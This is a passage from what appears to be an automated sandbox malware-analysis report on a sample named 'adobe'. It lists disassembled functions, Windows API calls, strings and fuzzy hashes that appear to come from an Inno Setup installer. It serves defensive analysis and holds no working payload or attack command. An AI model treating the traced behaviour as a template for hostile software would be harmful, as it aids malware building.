                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A18830$A122A26310A570Focus
                                                                                                                                                          • String ID: {H
                                                                                                                                                          • API String ID: 3906783838-1783425356
                                                                                                                                                          • Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                                                                                          • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                                                                                          • Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                                                                                          • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00476888 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004767B0: GetWindowThreadProcessId.USER32(00000000), ref: 004767B8
                                                                                                                                                            • Part of subcall function 004767B0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004768AF,0049B050,00000000), ref: 004767CB
                                                                                                                                                            • Part of subcall function 004767B0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004767D1
                                                                                                                                                          • SendMessageA.USER32(00000000,0000004A,00000000,BlG), ref: 004768BD
                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00476902
                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0047690C
                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00476961
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                                                                          • String ID: BlG$CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                                                                          • API String ID: 613034392-3388943489
                                                                                                                                                          • Opcode ID: 493204cbb9f30947e948617084b0342a826f55335b3a7ae31835fde674a1f57b
                                                                                                                                                          • Instruction ID: df859dff2162c270e2d7d1c5060a18d5d2758608ab9b0db3860dd5af44bb5bd3
                                                                                                                                                          • Opcode Fuzzy Hash: 493204cbb9f30947e948617084b0342a826f55335b3a7ae31835fde674a1f57b
                                                                                                                                                          • Instruction Fuzzy Hash: F531C4B4F006159ADB10EBB988427EEB6A59F04304F51843BF548FB382D67D4D008BAD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00494B54 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0044FF9C: SetEndOfFile.KERNEL32(?,?,0045BB62,00000000,0045BCED,?,00000000,00000002,00000002), ref: 0044FFA3
                                                                                                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00494BE5
                                                                                                                                                          • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00494BF9
                                                                                                                                                          • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494C13
                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494C1F
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494C25
                                                                                                                                                          • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494C38
                                                                                                                                                          Strings
                                                                                                                                                          • Deleting Uninstall data files., xrefs: 00494B5B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                                                                          • String ID: Deleting Uninstall data files.
                                                                                                                                                          • API String ID: 1570157960-2568741658
                                                                                                                                                          • Opcode ID: 2f38f4aeba9c8d33851b350cccc0448d854c72f9a93701f6141f9ee4b509150d
                                                                                                                                                          • Instruction ID: e1fcdc77d6d78d50d68a388ab1430eaee9cd4602355dadba40cd1fe6c0376bc1
                                                                                                                                                          • Opcode Fuzzy Hash: 2f38f4aeba9c8d33851b350cccc0448d854c72f9a93701f6141f9ee4b509150d
                                                                                                                                                          • Instruction Fuzzy Hash: 1321A270314204AEEB10AB76FD86F1737A8EB9871CF11403BB5049A2E3D67C9C059B6D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046F344 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F441,?,?,?,?,00000000), ref: 0046F3AB
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F441), ref: 0046F3C2
                                                                                                                                                          • AddFontResourceA.GDI32(00000000), ref: 0046F3DF
                                                                                                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F3F3
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set value in Fonts registry key., xrefs: 0046F3B4
                                                                                                                                                          • AddFontResource, xrefs: 0046F3FD
                                                                                                                                                          • Failed to open Fonts registry key., xrefs: 0046F3C9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                                                                          • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                                                                          • API String ID: 955540645-649663873
                                                                                                                                                          • Opcode ID: 2999f484c9fa7101e2376ab1a673f13ffbd4f0a5e4229ddd32b43e9622a974b8
                                                                                                                                                          • Instruction ID: f1b7769b30759bd79ce57191d192b4d330d9cf52c64851f68664acd4af899289
                                                                                                                                                          • Opcode Fuzzy Hash: 2999f484c9fa7101e2376ab1a673f13ffbd4f0a5e4229ddd32b43e9622a974b8
                                                                                                                                                          • Instruction Fuzzy Hash: 5C21B5707442047BDB10EAA6AC42B5F779CDB55708F504077B940EB3C2EA7CDD09966E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00462658 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                                                                            • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                                                                            • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                                                                                          • GetVersion.KERNEL32 ref: 00462688
                                                                                                                                                          • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004626C6
                                                                                                                                                          • SHGetFileInfo.SHELL32(00462764,00000000,?,00000160,00004011), ref: 004626E3
                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00462701
                                                                                                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00462764,00000000,?,00000160,00004011), ref: 00462707
                                                                                                                                                          • SetCursor.USER32(?,00462747,00007F02,00462764,00000000,?,00000160,00004011), ref: 0046273A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                                                                          • String ID: Explorer
                                                                                                                                                          • API String ID: 2594429197-512347832
                                                                                                                                                          • Opcode ID: bdfce88c962d93acead51d16ec639fbc6b01250f553aedacbf4178654b593b64
                                                                                                                                                          • Instruction ID: 6a4e252a28e1308c719c9726d886bca0e07c323248169c17b4ee411155371309
                                                                                                                                                          • Opcode Fuzzy Hash: bdfce88c962d93acead51d16ec639fbc6b01250f553aedacbf4178654b593b64
                                                                                                                                                          • Instruction Fuzzy Hash: 4E21E7707407047AE714BB798D47F9B76989B08708F5040BFB605EA1D3DABC8C1486AE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00476F8C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FA5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476FAB
                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FBE
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0), ref: 00476FE8
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00477006
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                                                                          • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                                                                          • API String ID: 2704155762-2318956294
                                                                                                                                                          • Opcode ID: b8f334fc9ba9ede3ca0d022d09803a2f6d276471e4ced67ec5e36412e52a9507
                                                                                                                                                          • Instruction ID: 04a5afe5644114c9e654b58a063851b3298de4fad75a38fc97de6a0c2b4846ec
                                                                                                                                                          • Opcode Fuzzy Hash: b8f334fc9ba9ede3ca0d022d09803a2f6d276471e4ced67ec5e36412e52a9507
                                                                                                                                                          • Instruction Fuzzy Hash: F0012242744B843AE52031BA4C82FFB604C8B40769F658137BB0CEA2C2E9AD9C06016E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
                                                                                                                                                          • LocalFree.KERNEL32(007426A0,00000000,00401B68), ref: 00401ACF
                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,007426A0,00000000,00401B68), ref: 00401AEE
                                                                                                                                                          • LocalFree.KERNEL32(007436A0,?,00000000,00008000,007426A0,00000000,00401B68), ref: 00401B2D
                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
                                                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                          • String ID: t<t
                                                                                                                                                          • API String ID: 3782394904-2283984196
                                                                                                                                                          • Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                                                                                          • Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
                                                                                                                                                          • Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                                                                                          • Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045962C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(00000000,004597AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495ECB,?,00000000,00495F6E), ref: 004596F2
                                                                                                                                                            • Part of subcall function 00453920: FindClose.KERNEL32(000000FF,00453A16), ref: 00453A05
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to strip read-only attribute., xrefs: 004596C0
                                                                                                                                                          • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004596CC
                                                                                                                                                          • Stripped read-only attribute., xrefs: 004596B4
                                                                                                                                                          • Failed to delete directory (%d). Will retry later., xrefs: 0045970B
                                                                                                                                                          • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459767
                                                                                                                                                          • Deleting directory: %s, xrefs: 0045967B
                                                                                                                                                          • Failed to delete directory (%d)., xrefs: 00459788
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseErrorFindLast
                                                                                                                                                          • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                                                                          • API String ID: 754982922-1448842058
                                                                                                                                                          • Opcode ID: 837aa2fd732afddfbdee691d697b2729c7b14edfd7e72b1b983d1cf92eaacf5a
                                                                                                                                                          • Instruction ID: a86c8ab60afa317b509f53e9f989c8e764947ac742467407c0eea8b2d16f96ba
                                                                                                                                                          • Opcode Fuzzy Hash: 837aa2fd732afddfbdee691d697b2729c7b14edfd7e72b1b983d1cf92eaacf5a
                                                                                                                                                          • Instruction Fuzzy Hash: B1418330A14205DBCB10EFA988012AE76E5AF4D31AF54857FBC1597393DB7C8D0D8759
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00422E60 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCapture.USER32 ref: 00422EB4
                                                                                                                                                          • GetCapture.USER32 ref: 00422EC3
                                                                                                                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                                                                                          • ReleaseCapture.USER32 ref: 00422ECE
                                                                                                                                                          • GetActiveWindow.USER32 ref: 00422EDD
                                                                                                                                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                                                                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                                                                                          • GetActiveWindow.USER32 ref: 00422FCF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 862346643-0
                                                                                                                                                          • Opcode ID: 8182acde5771262159e4f659bae907e1166abbb07305575d687dab3498c67f02
                                                                                                                                                          • Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
                                                                                                                                                          • Opcode Fuzzy Hash: 8182acde5771262159e4f659bae907e1166abbb07305575d687dab3498c67f02
                                                                                                                                                          • Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042F104 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0042F145
                                                                                                                                                          • GetActiveWindow.USER32 ref: 0042F14E
                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
                                                                                                                                                          • SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ActiveLong$Message
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2785966331-0
                                                                                                                                                          • Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                                                                                                          • Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
                                                                                                                                                          • Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                                                                                                          • Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00429490 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 73A1A570.USER32(00000000), ref: 0042949A
                                                                                                                                                          • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                                                                                            • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                                                                                          • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                                                                                          • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 361401722-0
                                                                                                                                                          • Opcode ID: 39fe41d515b6e139a7fb993673c493c01ad0263482789a8114dfaf7291a0699f
                                                                                                                                                          • Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
                                                                                                                                                          • Opcode Fuzzy Hash: 39fe41d515b6e139a7fb993673c493c01ad0263482789a8114dfaf7291a0699f
                                                                                                                                                          • Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041DE34 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 73A1A570.USER32(00000000,?,00419069,004972A6), ref: 0041DE37
                                                                                                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,?,00419069,004972A6), ref: 0041DE41
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004972A6), ref: 0041DE4E
                                                                                                                                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                                                                                          • GetStockObject.GDI32(00000007), ref: 0041DE6B
